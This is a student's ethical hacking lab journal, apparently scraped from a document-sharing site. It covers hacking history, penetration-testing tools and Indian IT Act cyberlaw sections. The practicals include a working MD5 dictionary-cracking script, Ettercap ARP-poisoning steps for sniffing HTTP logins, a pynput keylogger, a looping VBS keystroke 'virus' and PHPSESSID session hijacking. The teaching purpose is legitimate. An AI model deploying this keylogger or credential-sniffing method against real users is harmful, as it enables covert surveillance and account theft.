18 Ajit Gupta EH Practical

Ajit Gupta Roll No.
: 18
Elective-3
Subject Name:
Ethical Hacking Lab
1
Ajit Gupta Roll No.: 18
Practical No. 1
Introduction of Ethical Hacking
I. INTRODUCTION
The term “hacker” has a dual usage in the computer industry today. Originally, the term was
defined as: “A person who enjoys learning the details of computer systems and how to stretch
their capabilities-as opposed to most users of computers, who prefer to learn only the
minimum amount necessary. One who programs enthusiastically or who enjoys
programming rather than just theorizing about programming”. This complimentary
description was often extended to the verb form “hacking,” which was used to describe the
rapid crafting of a new program or the making of changes to existing, usually complicated
software. Because of the increasing popularity of computers and their continued high cost,
access to them was usually restricted. When refused access to the computers, some users
would challenge the access controls that had been put in place. They would steal passwords
or account numbers by looking over someone's shoulder, explore the system for bugs that
might get them past the rules, or even take control of the whole system. They would do these
things in order to be able to run the programs of their choice, or just to change the limitations
under which their programs were running. Initially these computer intrusions were fairly
benign, with the most damage being the theft of computer time. Other times, these recreations
would take the form of practical jokes. However, these intrusions did not stay benign for
long. Occasionally the less talented, or less careful, intruders would accidentally bring down
a system or damage its files, and the system administrators would have to restart it or make
repairs. Other times, when these intruders were again denied access once their activities were
discovered, they would react with purposefully destructive actions. When the number of these
destructive computer intrusions became noticeable, due to the visibility of the system or the
extent of the damage inflicted, it became “news” and the news media picked up on the story.
Instead of using the more accurate term of “computer criminal,” the media began using the
term “hacker” to describe individuals who break into computers for fun, revenge, or profit.
Since calling someone a “hacker” was originally meant as a compliment, computer security
2
professionals prefer to use the term “cracker” or “intruder” for those hackers who turn to the
dark side of hacking. For clarity, we will use the explicit terms “ethical hacker” and “criminal
hacker”.
1) What is ethical Hacking?
With the growth of the Internet, computer security has become a major concern for businesses
and governments. They want to be able to take advantage of the Internet for electronic
commerce, advertising, information distribution and access, and other pursuits, but they are
worried about the possibility of being “hacked.” At the same time, the potential customers of
these services are worried about maintaining control of personal information that varies from
credit card numbers to social security numbers and home addresses. In their search for a way
to approach the problem, organizations came to realize that one of the best ways to evaluate
the intruder threat to their interests would be to have independent computer security
professionals attempt to break into their computer systems. This scheme is similar to having
independent auditors come into an organization to verify its bookkeeping records. In the case
of computer security, these “tiger teams” or “ethical hackers” would employ the same tools
and techniques as the intruders, but they would neither damage the target systems nor steal
information. Instead, they would evaluate the target systems' security and report back to the
owners with the vulnerabilities they found and instructions for how to remedy them. This
method of evaluating the security of a system has been in use from the early days of
computers. In one early ethical hack, the United States Air Force conducted a “security
evaluation” of the Multics operating systems for “potential use as a two-level (secret/top
secret) system.” Their evaluation found that while Multics was “significantly better than
other conventional systems,” it also had “ … vulnerabilities in hardware security, software
security, and procedural security” that could be uncovered with “a relatively low level of
effort.” The authors performed their tests under a guideline of realism, so that their results
would accurately represent the kinds of access that an intruder could potentially achieve.
They performed tests that were simple information-gathering exercises, as well as other tests
that were outright attacks upon the system that might damage its integrity. Clearly, their
3
audience wanted to know both results. There are several other now unclassified reports that
describe ethical hacking activities within the U.S. military. With the growth of computer
networking, and of the Internet in particular, computer and network vulnerability studies
began to appear outside of the military establishment. Most notable of these was the work by
Farmer and Venema, which was originally posted to Usenet in December of 1993. They
discussed publicly, perhaps for the first time, this idea of using the techniques of the hacker
to assess the security of a system. With the goal of raising the overall level of security on the
Internet and intranets, they proceeded to describe how they were able to gather enough
information about their targets to have been able to compromise security if they had chosen
to do so. They provided several specific examples of how this information could be gathered
and exploited to gain control of the target, and how such an attack could be prevented. Farmer
and Venema elected to share their report freely on the Internet in order that everyone could
read and learn from it. However, they realized that the testing at which they had become so
adept might be too complex, time-consuming, or just too boring for the typical system
administrator to perform on a regular basis. For this reason, they gathered up all the tools that
they had used during their work, packaged them in a single, easy-to-use application, and gave
it away to anyone who chose to download it. Their program, called Security Analysis Tool
for Auditing Networks, or SATAN, was met with a great amount of media attention around
the world. Most of this early attention was negative, because the tool's capabilities were
misunderstood. The tool was not an automated hacker program that would bore into systems
and steal their secrets. Rather, the tool performed an audit that both identified the
vulnerabilities of a system and provided advice on how to eliminate them. Just as banks have
regular audits of their accounts and procedures, computer systems also need regular checking.
The SATAN tool provided that auditing capability, but it went one step further: it also advised
the user on how to correct the problems it discovered. The tool did not tell the user how the
vulnerability might be exploited, because there would be no useful point in doing so.
4
2) Who are ethical hackers?
Successful ethical hackers possess a variety of skills. First and foremost, they must be
completely trustworthy. While testing the security of a client's systems, the ethical hacker
may discover information about the client that should remain secret. In many cases, this
information, if publicized, could lead to real intruders breaking into the systems, possibly
leading to financial losses. During an evaluation, the ethical hacker often holds the “keys to
the company,” and therefore must be trusted to exercise tight control over any information
about a target that could be misused. The sensitivity of the information gathered during an
evaluation requires that strong measures be taken to ensure the security of the systems being
employed by the ethical hackers themselves: limited-access labs with physical security
protection and full ceiling-to-floor walls, multiple secure Internet connections, a safe to hold
paper documentation from clients, strong cryptography to protect electronic results, and
isolated networks for testing. Ethical hackers typically have very strong programming and
computer networking skills and have been in the computer and networking business for
several years. They are also adept at installing and maintaining systems that use the more
popular operating systems (e.g., UNIX or Windows NT) used on target systems. These base
skills are augmented with detailed knowledge of the hardware and software provided by the
more popular computer and networking hardware vendors. It should be noted that an
additional specialization in security is not always necessary, as strong skills in the other areas
imply a very good understanding of how the security on various systems is maintained. These
systems management skills are necessary for the actual vulnerability testing, but are equally
important when preparing the report for the client after the test. Finally, good candidates for
ethical hacking have more drive and patience than most people. Unlike the way someone
breaks into a computer in the movies, the work that ethical hackers do demands a lot of time
and persistence. This is a critical trait, since criminal hackers are known to be extremely
patient and willing to monitor systems for days or weeks while waiting for an opportunity. A
typical evaluation may require several days of tedious work that is difficult to automate.
Some portions of the evaluations must be done outside of normal working hours to avoid
5
interfering with production at “live” targets or to simulate the timing of a real attack. When
they encounter a system with which they are unfamiliar, ethical hackers will spend the time
to learn about the system and try to find its weaknesses. Finally, keeping up with the ever-
changing world of computer and network security requires continuous education and review.
One might observe that the skills we have described could just as easily belong to a criminal
hacker as to an ethical hacker. Just as in sports or warfare, knowledge of the skills and
techniques of your opponent is vital to your success. In the computer security realm, the
ethical hacker's task is the harder one. With traditional crime anyone can become a shoplifter,
graffiti artist, or a mugger. Their potential targets are usually easy to identify and tend to be
localized. The local law enforcement agents must know how the criminals ply their trade and
how to stop them. On the Internet anyone can download criminal hacker tools and use them
to attempt to break into computers anywhere in the world. Ethical hackers have to know the
techniques of the criminal hackers, how their activities might be detected, and how to stop
them. Given these qualifications, how does one go about finding such individuals? The best
ethical hacker candidates will have successfully published research papers or released
popular open-source security software. The computer security community is strongly self-
policing, given the importance of its work. Most ethical hackers, and many of the better
computer and network security experts, did not set out to focus on these issues. Most of them
were computer users from various disciplines, such as astronomy and physics, mathematics,
computer science, philosophy, or liberal arts, who took it personally when someone disrupted
their work with a hack. One rule that IBM's ethical hacking effort had from the very
beginning was that we would not hire ex-hackers. While some will argue that only a “real
hacker” would have the skill to actually do the work, we feel that the requirement for absolute
trust eliminated such candidates. We likened the decision to that of hiring a fire marshal for
a school district: while a gifted ex-arsonist might indeed know everything about setting and
putting out fires, would the parents of the students really feel comfortable with such a choice?
This decision was further justified when the service was initially offered: the customers
themselves asked that such a restriction be observed. Since IBM's ethical hacking group was
formed, there have been numerous ex-hackers who have become security consultants and
6
spokespersons for the news media. While they may very well have turned away from the
“dark side,” there will always be a doubt.
3) What do ethical hackers do?
An ethical hacker's evaluation of a system's security seeks answers to three basic questions:
• What can an intruder see on the target systems?

• What can an intruder do with that information?
• Does anyone at the target notice the intruder's attempts or successes?
While the first and second of these are clearly important, the third is even more important: If
the owners or operators of the target systems do not notice when someone is trying to break
in, the intruders can, and will, spend weeks or months trying and will usually eventually
succeed. When the client requests an evaluation, there is quite a bit of discussion and
paperwork that must be done up front. The discussion begins with the client's answers to
questions similar to those posed by Garfinkel and Spafford:
1. What are you trying to protect?
2. What are you trying to protect against?
3. How much time, effort, and money are you willing to expend to obtain adequate
protection?
7
II. PLANNING THE TEST
Aspects that should be focused on:
a) Who should perform penetration testing?
b) How often the tests have to be conducted?
c) What are the methods of measuring and communicating the results?
d) What if something unexpected happens during the test and brings the whole system down?
e) What are the organization's security policies?
III. THE MINIMUM SECURITY POLICIES THAT AN ORGANIZATION

SHOULD POSSESS
a) Information policy
b) Security policy
c) Computer use
d) User management
e) System administration procedures
f) Incident response procedures
g) Configuration management
h) Design methodology
i) Disaster methodology
j) Disaster recovery plans.
8
IV. ETHICAL HACKING AS A DYNAMIC PROCESS
Ethical hacking is a dynamic process since running through the penetration test once gives
the current set of security issues which subject to change over time therefore penetration
testing must be continuous to ensure that system movements and installation of new
applications do not introduce new vulnerabilities in the system. Areas to be tested:
• Application servers
• Firewalls and security devices
• Network security
• Wireless security
• Multi layered assessment:

Various areas of security are evaluated using a multilayered approach.
• Each area of security defines how the target will be assessed.
• An identified vulnerability at one layer may be protected at another layer minimizing the
associated risk of the vulnerability
V. WEAPONS OF AN ETHICAL HACKER

Automatic tools has changed the world of penetration testing/ethical hacking, IT security researcher has
been developed and currently developing different tools to make the test fast, reliable and easier task.
Without automatic tools, the hacking process is slow and time consuming. in this paper we summarize the
best tools that are widely used in the world of hacking:
Nmap
Nmap is a best tool ever that are used in the second phase of ethical hacking means port scanning, Nmap
was originally command line tool that has been developed for only Unix/Linux based operating system but
now its windows version is also available and ease to use. It is use for Operating system fingerprinting too.
9
Nessus
Nessus is the world most famous vulnerability scanner, Nessus has been developed by Tenable network
security, it is available for free of cost for non-enterprise environment means for home user. It is a network
vulnerability scanner and use for finding the critical bugs on a system.
Nikto
Nikto is a free and open source tool, It checks for outdated versions of over 1000 servers, and version
specific problems on over 270 servers, It find out the default files and programs. It is a best tool for web
server penetration testing.
Kismet
Now a days Wardriving or Wireless LAN(WLAN) hacking is in market and different companies hire
penetration tester for doing test on wireless network, this test requires some tools, so Kismet is a best choice
for do this. Kismet identifies networks by passively collecting packets and detecting networks, which allows
it to detect (and given time, expose the names of) hidden networks and the presence of nonbeaconing
networks via data traffic.
MetaSploit
The best tool ever, Metasploit contain a database that has a list of available exploit and it is easy to use and
best tool for doing penetration testing, Metasploit framework is a sub project and is use to execute exploit
code against a machine and get the desire task done.
NetStumbler
Once again for wardriving, well netstumbler are available for windows based operating system, it works on
windows based operating system.It can detect WiFi that is IEEE 802.11b, 802.11g and 802.11a networks.
MiniStumbler is also available and works on Windows CE based system.
Techniques of ethical hacking:

• Information gathering
• Vulnerability scanning
• Exploitation
• Test Analysis
• Information Gathering
In this step, the testers collect as much information about the web application as possible and gain
understanding of its logic. The deeper the testers understand the test target, the more successful the
10
penetration testing will be [3]. The information gathered will be used to create a knowledge base to
act upon in later steps. The testers should gather all information even if it seems useless and
unrelated since no one knows at the outset what bits of information are needed. This step
can be carried out in many different ways: by using public tools such as search engines;
using scanners; sending simple HTTP requests or specially crafted requests or walking
through the application.
• Vulnerability Analysis
Using the knowledge collected from the information gathering step, the testers then scan the
vulnerabilities that exist in the web application. The testers can conduct testing on
configuration management, business logic, authentication, session management,
authorization, data validation, denial of service, and web services . In this step, web server
vulnerabilities, authentication mechanism vulnerabilities, input-based vulnerabilities and
function-specific vulnerabilities are examined.
• Exploitation
After the vulnerability analysis step, the testers should have a good idea of the areas that will
be targeted for exploits. With the list of vulnerabilities on hand, the two applications were
then exploited.
• Test Analysis Phase
This phase is the interface of the results, the testers and the target entity. It is important that
the target entity is aware of typical attacker modus operandi, techniques and tools attackers
rely on, exploits they use, and any needless exposure of data the target is suffering from.
VI. APPROACHES TOWARDS ETHICAL HACKING (PENTEST). Any
combination of the following may be called for:
• Remote network.
This test simulates the intruder launching an attack across the Internet. The primary
defenses that must be defeated here are border firewalls, filtering routers, and Web servers.
• Remote dial-up network.
This test simulates the intruder launching an attack against the client's modem pools. The
primary defenses that must be defeated here are user authentication schemes. These kinds
11
of tests should be coordinated with the local telephone company.

• Local network.
This test simulates an employee or other authorized person who has a legal connection to
the organization's network. The primary defenses that must be defeated here are intranet
firewalls, internal Web servers, server security measures, and e-mail systems.
• Stolen laptop computer. In this test, the laptop computer of a key employee, such as an
upper level manager or strategist, is taken by the client without warning and given to the
ethical hackers. They examine the computer for passwords stored in dial-up software,
corporate information assets, personnel information, and the like. Since many busy users
will store their passwords on their machine, it is common for the ethical hackers to be
able to use this laptop computer to dial into the corporate intranet with the owner's full
privileges.
• Social engineering.
This test evaluates the target organization's staff as to whether it would leak information
to someone. A typical example of this would be an intruder calling the organization's
computer help line and asking for the external telephone numbers of the modem pool.
Defending against this kind of attack is the hardest, because people and personalities are
involved. Most people are basically helpful, so it seems harmless to tell someone who
appears to be lost where the computer room is located, or to let someone into the building
who “forgot” his or her badge. The only defense against this is to raise security awareness.
• Physical entry.
This test acts out a physical penetration of the organization's building. Special
arrangements must be made for this, since security guards or police could become
involved if the ethical hackers fail to avoid detection. Once inside the building, it is
important that the tester not be detected. One technique is for the tester to carry a document
with the target company's logo on it. Such a document could be found by digging through
trash cans before the ethical hack or by casually picking up a document from a trash can
or desk once the tester is inside. The primary defenses here are a strong security policy,
security guards, access controls and monitoring, and security awareness. Each of these
12
kinds of testing can be performed from three perspectives: as a total outsider, a “semi-
outsider,” or a valid user.
A total outsider has very limited knowledge about the target systems.
The only information used is available through public sources on the Internet. This test
represents the most commonly perceived threat. A well-defended system should not allow
this kind of intruder to do anything.
A semi-outsider has limited access to one or more of the organization's
computers or networks. This tests scenarios such as a bank allowing its depositors to use
special software and a modem to access information about their accounts. A well-
defended system should only allow this kind of intruder to access his or her own account
information.
A valid user has valid access to at least some of the organization's
computers and networks. This tests whether or not insiders with some access can extend
that access beyond what has been prescribed. A well-defended system should allow an
insider to access only the areas and resources that the system administrator has assigned
to the insider.
13
1. WHOIS foot printing using SmartWHOIS
14
2. Email tracker
15
3. DNS foot printing using NS-Lookup
16
Practical No. 2
Scanning Network, Enumeration & Sniffing Tool
Aim: - Use software tools/commands to perform network scanning and sniffing and generate analysis
report.
Network scanning tools like
1) NMAP:
17
18
2) Angry IP Scanner:
19
IDS Tool
1) Snort:
20
21
22
Sniffing Tool
1) Wireshark:
23
24
Sniffing tool
1) Wireshark:
25
Practical No:3
Malware Threats: Worms, viruses, Trojans
Aim: - Using the software tools/commands to perform the following, generate an

analysis report.
A. Password Cracking:
Basic String:
26
Complicated String:
27
B) Dictionary attack
28
29
dictattack.py:
import hashlib
flag=0
p_hash=input("Enter MD5 hash")
dictionary=input("Enter dictionary Filename:")
try:
password_file=open(dictionary,"r")
except:
print("No file found")
quit()
for word in password_file:
enc_word=word.encode('utf-8')
digest =hashlib.md5(enc_word.strip()).hexdigest()
if(digest==p_hash):
print("password has been found")
print("password is :" +word)
flag=1
break
if(flag==0):
print("No password found")
30
C) Encrypt and decrypt passwords using online and offline tools:

Online Tool:
Offline Tool:
31
D) ARP Poising
Step 1 − Install the VMware workstation and install the Kali Linux operating system.
Step 2 − Login into the Kali Linux using username pass “root, toor”.
Step 3 − Make sure you are connected connected to local LAN and check the IP address
address by typing the
command ifconfig in the terminal.
32
Step 4 − Open up the terminal and type “Ettercap –G” to start the graphical version of
Ettercap.
Step 5 − Now click the tab “sniff” in the menu bar and select “unified “unified sniffing” and click
OK to select the interface. We are going to use “eth0” which means Ethernet connection.
33
Step 6 − Now click the “hosts” tab in the menu bar and click “scan for hosts”. It will start
scanning the whole network for the alive hosts.
Step 7 − Next, click the “hosts” tab and select “hosts list” to see the number of hosts available in
the network. This list also includes the default gateway address. We have to be careful when we
select the targets.
Step 8 − Now we have to choose the targets. targets. In MITM, our target is the host
machine, machine, and the route will be the router address to forward the traffic. In
an MITM attack, , the attacker intercepts the network and sniffs the packets.
packets. So, we will add the victim as “target 1” and the router address as “target
2.”
In VMware environment, environment, the default default gateway will always end
with “2” because “1” is assigned to the physical machine.
Step 9 − In this scenario, our target is “192.168.121.129” and the router is

“192.168.121.2”. So we will add target 1 as victim IP and target 2 as router IP.
34
Step 10 − Now click on “MITM” and click “ARP poisoning”. Thereafter, check the
option “Sniff remote connections” and click OK
Step 11 − Click “start” and select “start sniffing”. This will start ARP poisoning in
the network which means we have enabled our network card in “promiscuous
“mode” and now the local traffic can be sniffed. Note − We have allowed only
HTTP sniffing with, Ettercap, so don’t expect HTTPS packets to be sniffed with
this process.
Step 12 − Now it’s time to see the results; results; if our victim logged into some.
websites. You can see the results in the toolbar of Ettercap.
This is how sniffing works. You must have understood how easy it is to get the
HTTP credentials just by enabling ARP poisoning
35
Ipconfig, ping, traceroute and netstat:

a) Traceroute:
b) Ping:
36
c) Netstat:
d) Ifconfig:
37
38
2. Steganography tools.
39
40
41
Practical No:4
Developing and implementing malwares
Aim: - Creating a simple keylogger in python, creating a virus, creating a trojan.
A) Create keylogger using python:
42
Log.py:-
import pynput
import logging
from pynput.keyboard import Key, Listener
log_dir = "D:/"
logging.basicConfig(filename = (log_dir + "keyLog.txt"),level=logging.DEBUG,
format='%(asctime)s: %(message)s')
def my_key_on_press(key):
logging.info(str(key))
with Listener(on_press=my_key_on_press) as listener:
listener.join()
B) Create Virus:
Virus.vbs
set x=wscript.createobject("wscript.shell")
do
wscript.sleep 100
x.sendkeys"{CAPSLOCK}"
x.sendkeys"{NUMLOCK}"
x.sendkeys"I am a Virus"
x.sendkeys"{SCROLLLOCK}"
loop
43
Practical No:5
Hacking web servers, web applications
Aim: - Hacking a website by Remote File Inclusion, Disguise as Google Bot to

view hidden content of a website.
A. Remote File Inclusion:
44
45
46
47
B) Disguise as Google Bot:
Check for Proxy:
48
Locate GoogleBot:
Config browser to google bot:
49
Output: checking proxy again:
50
Practical No. 6
SQL injection and Session hijacking
Aim: - SQL injection for website hacking, session hijacking.
A) SQL injection :
Data in table:
51
Login.php:
Index.php:
52
B) Session hijacking:
Clear cookies:
Admin login:
53
Copying Admin PHPSESSID :
54
Loging in as different user:
User PHPSESSID :
55
Replacing user PHPSESSID with Admin’s:
Admin session taking over user’s:
56
Practical No. 7
Wireless network hacking, cloud computing security, cryptography
Aim: - Perform encryption and decryption of text by using cryptool2

Using the cryptool 2 tool perform the following.
a) Ceaser Cipher
b) Substitution Cipher
c) Playfair Cipher
d) Transposition
Answer:
57
1) Ceaser Cipher:
58
59
2) Substitution Cipher:
60
61
3) Playfair Cipher:
62
63
4) Transposition:
64
65
66
Practical No. 8
Pen Testing
&
Cyberlaw section under IT act 2000 - 43,65,66A, 66B,66C,66D,66E,66F,67A,
67B ,71,72,73 and 74
1) Explain Penetration Testing using Metasploit and metasploitable.
Penetration testing, often called “pentesting”, “pen testing”, "network penetration

testing", or “security testing”, is the practice of attacking your own or your
clients’ IT systems in the same way a hacker would to identify security holes. Pen
testing tries to gain control over systems and obtain data.
The person carrying out a penetration test is called a penetration tester or pen
tester. For the rest of the article, we will refer to it as a pen test or pen testing.
Pen Test Steps

Each pen test might have different steps, but a pen test generally has the following:
• Set the scope

• Reconnaissance
• Discovery
• Exploitation
• Brute Forcing
• Social Engineering
• Take Control
• Pivoting
• Gather Evidence
• Cleanup
• Report
• Remediation
67
Metasploit:
Metasploit is simple to use and is designed with ease-of-use in mind to aid Penetration
Testers.
What is the Metasploit Framework and How is it Used?
The Metasploit framework is a very powerful tool which can be used by cybercriminals
as well as ethical hackers to probe systematic vulnerabilities on networks and servers.
Because it’s an open-source framework, it can be easily customized and used with most
operating systems.
With Metasploit, the pen testing team can use ready-made or custom code and introduce
it into a network to probe for weak spots. As another flavor of threat hunting, once flaws
are identified and documented, the information can be used to address systemic
weaknesses and prioritize solutions.
The framework also carries nearly 500 payloads, some of which include:
• Command shell payloads that enable users to run scripts or random

commands against a host
• Dynamic payloads that allow testers to generate unique payloads to evade
antivirus software
• Meterpreter payloads that allow users to commandeer device monitors using
VMC and to take over sessions or upload and download files
• Static payloads that enable port forwarding and communications between
networks.
Metasploitable:
Metasploitable is a virtual Linux Operating Machine loaded with many types of
vulnerabilities Normally Founds In Operating System That Can be use for Exploiting
this Linux Machine. Metasploitable Project is also created and maintained By rapid7
Community (Metasploit-Framework Community).Metasploitable is Originally
Design For Metasploit Framework Testing .
In Simple Words, Metasploitable is a Operating System Based On Linux, Specially
Design For Practicing Penetration Testing Skills, Network Security Skill, Metasploit-
Framework Skills And many more.
68
The Main Goal of Metasploitable Is To Provide A Vulnerable Operating System,

that can used by New Networking Students, New Penetration Testers, Hackers,
Network Researcher For Practicing Their Skill in Secure Environment.
With Metasploitable, Anyone Can Easily Setup its Own Personal Secure lab for
testing their Skill Or To Learn New Things In Secure Environment. As We Already
Know, "practice makes man perfect" That's why Every Penetration Testers always
want to test their skill to make them more accurate. And At That Situation, This OS
Come In Main Role As Target/Victim OS.
Conclusion:
To Practicing And Testing Pentesting Skill, Metasploitable Virtual Machine is best

Choice to Create A Pentesting Personal Lab in Secure Environment.
69
2) Cyberlaw section under IT act 2000

A) Section 43:
Description: Penalty and compensation for damage to computer, computer
system, etc.
Penalty: Charges the services availed of by a person to the account of
another person by tampering with or manipulation any computer, computer
system or compute the network he shall be liable to pay damages by way of
compensation not exceeding one crore rupees to the person so affected.
Case: Reliance Jio owned by Mukesh Ambani had registered an FIR with
the Navi Mumbai police under section 379 (theft) of the IPC and section 43
(2) (data theft – downloads, copies or extracts any data, computer database
or information from such computer, computer system or computer network
including information or data held or stored in any removable storage
medium) and 66 (computer-related offenses) of the Information
Technology Act.
B) Section 65:
Description: Tampering with computer source documents.
Penalty: Whoever knowingly or intentionally conceals, destroys or alters
or intentionally or knowingly causes another to conceal, destroy, or alter
any computer source code used for a computer, computer programme,
computer system or computer network, when the computer source code is
required to be kept or maintained by law for the time being in force, shall
be punishable with imprisonment up to three years, or with fine which may
extend up to two lakh rupees, or with both.
Case: Reliance model handsets were to be exclusively used by Reliance
India Mobile Limited but the TATA Indicom staff members who were
figured as an accused tampered with pre-programmed CDMA digital
handsets belonging to Reliance Infocomm and activated with TATA
Indicom network with all dubious means. Offence was held to be made out
under Section 65 of IT Act.
70
C) Section 66A:
Description: Punishment for sending offensive messages through
communication service, etc.
Penalty: Any person who sends, by means of a computer resource or a
communication device
i. any information which he knows to be false, but for the purpose of
causing annoyance, inconvenience, danger, obstruction, insult, injury,
criminal intimidation, enmity, hatred or ill will, persistently by
making use of such computer resource or a communication device
OR
ii. any electronic mail or electronic mail message for the purpose of
causing annoyance or inconvenience or to deceive or to mislead the
addressee or recipient about the origin of such messages,
shall be punishable with imprisonment for a term which may extend to

three years and with fine.
Case: The first petition came up in the court following the arrest of two
girls in Maharashtra by Thane Police in November 2012 over
a Facebook post. The girls had made comments on the shutdown of
Mumbai for the funeral of Shiv Sena chief Bal Thackeray. The arrests
triggered outrage from all quarters over the manner in which the cyber law
was used. The petition was filed by Shreya Singhal, then a 21-year-old law
student.
71
D) Section 66B:
Description: Punishment for dishonestly receiving stolen computer
resource or communication device.
Penalty: Whoever dishonestly receive or retains any stolen computer resource
Or communication device knowing or having reason to believe the same to be
stolen computer resource or communication device, shall be punished with
imprisonment of either description for a term which may extend to three years or
with fine which may extend to rupees one lakh or with both.
E) Section 66C:
Description: Punishment for identity theft.
Penalty: Whoever, fraudulently or dishonestly make use of the electronic
signature, password or any other unique identification feature of any other
person, shall be punished with imprisonment of either description for a
term which may extend to three years and shall also be liable to fine which
may extend to rupees one lakh.
Case: On May 17, AIB had posted a video titled “If Apps were people”, in
which a women character Supriya, wants to sleep but the apps on her phone
turn out to be a major distraction. At 4.34 minutes of the video, one of the
characters in the video spells out the mobile number of another character
Rohan. Incidentally, the phone number turned out to be of one Rohina
Chhabra, a resident of Karnivihar area of Jaipur in Rajasthan. But for
Rohina, its has turned into a nightmare as getting continuous calls on her
number since then.
F) Section 66D:
Description: Punishment for cheating by personation by using computer
resource.
Penalty: Whoever, by means of any communication device or computer
resource cheats by personation, shall be punished with imprisonment of
either description for a term which may extend to three years and shall also
be liable to fine which may extend to one lakh rupees.
Case: A 17-year-old student was caught cheating during the Class X repeat
exam in Thane. A few minutes after the Maths Part I paper began at 10.30
am, the invigilator noticed the boy taking a picture of the question paper n
order to send to a friend for answers, the police said. The student was asked
to stop writing and taken aside, the police said. The authorities at the exam
centre then called the police. A case under section 66(D) of the Information
Technology Act was registered, the officer said, adding a probe was on.
72
G) Section 66E:
Description: Punishment for violation of privacy.
Penalty: Whoever, intentionally or knowingly captures, publishes or
transmits the image of a private area of any person without his or her
consent, under circumstances violating the privacy of that person, shall be
punished with imprisonment which may extend to three years or with fine
not exceeding two lakh rupees, or with both.
Case: Jawaharlal Nehru University MMS scandal In a severe shock to the
prestigious and renowned institute – Jawaharlal Nehru University, a
pornographic MMS clip was apparently made in the campus and
transmitted outside the university.Some media reports claimed that the two
accused students initially tried to extort money from the girl in the video
but when they failed the culprits put the video out on mobile phones, on the
internet and even sold it as a CD in the blue film market
H) Section 66F:
Description: Punishment for cyber terrorism.
Penalty: Whoever commits or conspires to commit cyber terrorism shall be
punishable with imprisonment which may extend to imprisonment for life.
Case: The Mumbai police have registered a case of ‘cyber terrorism’—the
first in the state since an amendment to the Information Technology Act—
where a threat email was sent to the BSE and NSE on Monday. The MRA
Marg police and the Cyber Crime Investigation Cell are jointly probing the
case. The suspect has been detained in this case.The police said an email
challenging the security agencies to prevent a terror attack was sent by one
Shahab Md with an ID sh.itaiyeb125@yahoo.in to BSE’s administrative
email ID corp.relations@bseindia.com at around 10.44 am on Monday.The
IP address of the sender has been traced to Patna in Bihar. The ISP is Sify.
The email ID was created just four minutes before the email was sent. “The
sender had, while creating the new ID, given two mobile numbers in the
personal details column. Both the numbers belong to a photo frame-maker
in Patna,’’ said an officer
I) Section 67A:
Description: Punishment for publishing or transmitting obscene material
in electronic form.
Penalty: Whoever publishes or transmits or causes to be published or
transmitted in the electronic form any material which contains sexually
explicit act or conduct shall be punished on first conviction with
73
imprisonment of either description for a term which may extend to five

years and with fine which may extend to ten lakh rupees and in the event
of second or subsequent conviction with imprisonment of either
description for a term which may extend to seven years and also with fine
which may extend to ten lakh rupees.
Case: This case is about posting obscene, defamatory and annoying
message about a divorcee woman in the Yahoo message group. E-mails
were forwarded to the victim for information by the accused through a
false e- mail account opened by him in the name of the victim. These
postings resulted in annoying phone calls to the lady. Based on the lady’s
complaint, the police nabbed the accused.Investigation revealed that he
was a known family friend of the victim and was interested in marrying
her. She was married to another person, but that marriage ended in divorce
and the accused started contacting her once again. On her reluctance to
marry him he started harassing her through internet.
J) Section 67B:
Description: Punishment for publishing or transmitting of material
depicting children in sexually explicit act, etc., in electronic form.
Penalty: Whosoever facilitates abusing children online, or records in any
electronic form own abuse or that of others pertaining to sexually explicit
act with children, shall be punished on first conviction with imprisonment
of either description for a term which may extend to five years and with
fine which may extend to ten lakh rupees and in the event of second or
subsequent conviction with imprisonment of either description for a term
which may extend to seven years and also with fine which may extend to
ten lakh rupees.
Case: Janhit Manch & Ors. v. The Union of India 10.03.2010 Public
Interest Litigation: The petition sought a blanket ban on pornographic
websites. The NGO had argued that websites displaying sexually explicit
content had an adverse influence, leading youth on a delinquent path.
K) Section71:
Description: Penalty for misrepresentation.
Penalty: Whoever makes any misrepresentation to, or suppresses any
material fact from the Controller or the Certifying Authority for obtaining
any licence or 1 [electronic signature Certificate], as the case may be, shall
be punished with imprisonment for a term which may extend to two years,
74
or with fine which may extend to one lakh rupees, or with both.
L) Section72:
Description: Penalty for Breach of confidentiality and privacy
Penalty: Save as otherwise provided in this Act or any other law for the
time being in force, if any person who, in pursuance of any of the powers
conferred under this Act, rules or regulations made thereunder, has
secured access to any electronic record, book, register, correspondence,
information, document or other material without the consent of the person
concerned discloses such electronic record, book, register,
correspondence, information, document or other material to any other
person shall be punished with imprisonment for a term which may extend
to two years, or with fine which may extend to one lakh rupees, or with
both.
M)Section73:
Description: Penalty for publishing electronic signature Certificate false
in certain particulars.
Penalty: No person shall publish a 1[electronic signature] Certificate or
otherwise make it available to any other person with the knowledge that
i. The Certifying Authority listed in the certificate has not issued it; or
ii. The subscriber listed in the certificate has not accepted it; or
iii. The certificate has been revoked or suspended
Unless such publication is for the purpose of verifying
[electronic signature] created prior to such suspension or revocation.
Any person who contravenes the provisions of sub-
section (1) shall be punished with imprisonment for a term which may
extend to two years, or with fine which may extend to one lakh rupees,
or with both.
N) Section 74:
Description: Publication for fraudulent purpose.
Penalty: Whoever knowingly creates, publishes or otherwise makes
available a 1 [electronic signature] Certificate for any fraudulent or
unlawful purpose shall be punished with imprisonment for a term which
may extend to two years, or with fine which may extend to one lakh
rupees, or with both.
75

18 Ajit Gupta EH Practical

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

18 Ajit Gupta EH Practical

Uploaded by

Copyright:

Available Formats

Ajit Gupta Roll No.

Introduction of Ethical Hacking

1) What is ethical Hacking?

2) Who are ethical hackers?

3) What do ethical hackers do?

• What can an intruder see on the target systems?

1. What are you trying to protect?

2. What are you trying to protect against?

II. PLANNING THE TEST

Aspects that should be focused on:

a) Who should perform penetration testing?

b) How often the tests have to be conducted?

c) What are the methods of measuring and communicating the results?

e) What are the organization's security policies?

III. THE MINIMUM SECURITY POLICIES THAT AN ORGANIZATION

e) System administration procedures

f) Incident response procedures

j) Disaster recovery plans.

IV. ETHICAL HACKING AS A DYNAMIC PROCESS

• Multi layered assessment:

• Each area of security defines how the target will be assessed.

V. WEAPONS OF AN ETHICAL HACKER

Techniques of ethical hacking:

of tests should be coordinated with the local telephone company.

1. WHOIS foot printing using SmartWHOIS

3. DNS foot printing using NS-Lookup

Scanning Network, Enumeration & Sniffing Tool

Aim: - Using the software tools/commands to perform the following, generate an

C) Encrypt and decrypt passwords using online and offline tools:

Step 9 − In this scenario, our target is “192.168.121.129” and the router is

Ipconfig, ping, traceroute and netstat:

Aim: - Creating a simple keylogger in python, creating a virus, creating a trojan.

